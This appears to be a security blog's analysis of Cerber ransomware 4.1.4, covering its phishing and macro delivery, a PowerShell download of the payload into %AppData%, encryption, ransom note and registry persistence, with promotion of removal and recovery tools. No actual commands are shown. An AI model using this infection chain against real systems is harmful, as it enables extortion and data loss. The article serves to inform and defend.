One of the most impactful ransomware viruses – Cerber has released yet another iteration of its fourth variant. The virus has applied changes in how it communicates with the C&C servers and some slight changes in the methods it infects, switching to malicious macros to conduct an infection. Regarding encryption, not much has changed and Cerber still alters the names of the encrypted files and adds a random 4 A-Z, 0-9 file extension. Anyone who has been infected by this iteration of Cerber ransomware should immediately focus on removing it from their computer instead of paying the ransom. If you are looking for alternative methods to remove Cerber by yourself and try to restore the encrypted files, we suggest you read the following article thoroughly.
|Short Description||This Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers adding four randomly generated A-Z 0-9 characters(ex. .z33f) as a file extension to the encrypted files and asks a ransom payoff for decryption.|
|Symptoms||Files are enciphered and become inaccessible by any type of software. Several ransom notes with instructions for paying the ransom shows as a “Readme.hta” files.|
|Distribution Method||Via malicious macros on Microsoft Office or Adobe Reader.|
|Detection Tool|| See If Your System Has Been Affected by Cerber 4.1.4 |
Malware Removal Tool
|Data Recovery Tool||Stellar Phoenix Data Recovery Technicians License(Pro version with more features) Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.|
|User Experience||Join our forum to Discuss Cerber Ransomware.|
Cerber 4.1.4 – In-Depth Information
In order to make you better understand how Cerber ransomware version 4.1.4 operates, we will take you through the threat methodologically from the distribution to the final ransom payment URL.
Cerber 4.1.4’s Distribution and Infection
To cause a successful infection, the creators of Cerber 4.1.4 ransomware have most likely used the assistance of a software, known in the research field as file joiner, which combines malicious files with legitimate documents. This tool may have allowed the coders to create an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document to edit it shortly after opening it:
The procedure for spreading this malware is rather the same as most procedures. Phishing e-mails may be used to spam the user, tricking him into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in a .doc file format and they have random digit names, like the following:
Such document is uploaded alongside a fraudulent spam-message that aims to convince the user with false messages, claiming the document is important, for example:
After opening the malicious macro, the infection may execute it in an obfuscated manner, which brings us to another tool, used by the coders of Cerber 4.1.4, malware obfuscators, that avoid detection by most conventional and widely used Anti-Virus programs.
Related Article: Obfuscation in Malware – The Key to A Successful infection
The malicious macros open the Power Shell as an administrator in Windows only to quietly execute command similar to the following:
Then, the malware also makes sure to download the real payload of Cerber 4.1.4 ransomware by connecting to a remote server via anther Power Shell, command, similar to the following, reported by Bleeping Computer researchers:
As visible, Cerber ransomware’s payload is being downloaded as a file, named winx64.exe, located in the %AppData% folder.
As soon as the malicious file is downloaded, the malware automatically starts the file, so that it begins to encrypt the files of the victim.
Cerber 4.1.4 – Post-Infection Analysis
By default, Cerber ransomware has not change it’s already strong and so far unbeatable encryption. It still uses an immensely strong combination of RSA and AES encryption algorithm to scramble files of the following types:
- Microsoft Office documents.
- Adobe Reader files.
- Adobe Photoshop and other Adobe software files.
- Audio files.
- Virtual machines.
- No longer openable.
- Changed names.
- Changed file extension.
Cerber also drops it’s distinctive “Readme.hta” ransom note file which once more leads to the standard Cerber payment web page:
After this has been completed, the ransomware may either heavily modify the registry entries to run the malicious executable located in the %AppData% folder to run every-time Windows starts and encrypt newly added files or files in remote drives, such as USB sticks and others.
How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files
Basically Cerber 4.1.4 is yet another variant of the so-far many Cerber variants which we have detected out in the wild. The malware is very sophisticated in what it does and researchers are yet to discover any bugs in it’s code, allowing them to crack the virus, as they did with the first variant of Cerber.
In case you are looking for methods to restore your files if they have been encoded by this nasty threat, advices are to immediately act and remove it safely, using the instructions below. You can try and remove it manually, but we strongly recommend using a professional malware removal tool to do the job for you swiftly and safely.
After removing Cerber, we have offered several alternative suggestions that may help you try to recover your non-openable files. We are constantly researching for newer and newer data recovery methods that will help you recover your files. Since sophisticated malware like Cerber deletes the files with several passes, it is very difficult to scrape up a solution that is 100% effective. Still, we will keep researching and fighting the fight against this nasty threat and update this article with more information if a decryptor is released, so we advise following our blog regularly.